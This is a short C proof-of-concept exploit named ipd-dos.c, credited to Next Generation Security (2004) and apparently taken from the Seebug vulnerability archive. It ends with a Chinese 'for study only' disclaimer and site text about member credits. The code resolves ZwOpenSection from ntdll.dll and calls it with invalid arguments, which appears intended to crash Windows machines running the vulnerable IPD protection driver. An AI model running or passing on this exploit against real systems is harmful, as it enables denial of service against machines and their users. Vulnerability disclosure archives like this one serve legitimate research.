/* * ipd-dos.c * * Copyright (c) 2002-2004 By Next Generation Security S.L. * All rights reserved * * Compiles with: cl ipd-dos.c * * Madrid, August 2004 */ #include <windows.h> #define MY_NULL 0x01 typedef DWORD (* zwopensection_TYPE)(DWORD Handle, DWORD mask, DWORD oa); int main(int argc, char *argv[]) { HINSTANCE dll; zwopensection_TYPE my_ZwOpenSection; if ((dll=LoadLibrary("ntdll.dll"))!=NULL) { if ((my_ZwOpenSection=(zwopensection_TYPE)GetProcAddress(dll,"ZwOpenSection"))!=NULL) { my_ZwOpenSection(MY_NULL,MY_NULL,MY_NULL); } } }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论